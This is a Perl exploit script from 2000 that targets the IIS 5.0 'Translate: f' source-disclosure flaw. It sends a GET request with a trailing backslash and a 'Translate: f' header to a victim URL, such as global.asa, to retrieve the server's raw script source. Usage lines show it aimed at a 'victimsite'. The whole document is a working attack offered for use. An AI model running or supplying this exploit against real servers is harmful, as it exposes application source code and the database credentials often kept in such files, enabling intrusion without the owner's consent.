#!/usr/bin/perl
# Expl0it By smiler@vxd.org
# Tested with sucess against IIS 5.0. Maybe it works against IIS 4.0 using a shared drive but I havenīt tested it yet.
# Get the source code of any script from the server using this exploit.
# This code was written after Daniel Docekal brought this issue in BugTraq.
# Cheers 351 and FractalG :)

if (not $ARGV[0]) {
  print qq~
  Geee itīs running !! kewl :)))
  Usage : srcgrab.pl <complete url of file to retrieve>
  Example Usage : srcgrab.pl http://www.victimsite.com/global.asa
  U can also save the retrieved file using : srcgrab.pl http://www.victim.com/default.asp > file_to_save
~; exit;}


$victimurl=$ARGV[0];

# Create a user agent object
use LWP::UserAgent;
$ua = new LWP::UserAgent;

# Create a request
my $req = new HTTP::Request GET => $victimurl . '\\'; # Here is the backslash at the end of the url ;)
$req->content_type('application/x-www-form-urlencoded');
$req->content_type('text/html');
$req->header(Translate => 'f'); # Here is the famous translate header :))
$req->content('match=www&errors=0');

# Pass request to the user agent and get a response back
my $res = $ua->request($req);

# Check the outcome of the response
if ($res->is_success) {
  print $res->content;
  } else {
  print $res->error_as_HTML;
}
#                    www.hack.co.za           [22 August 2000]#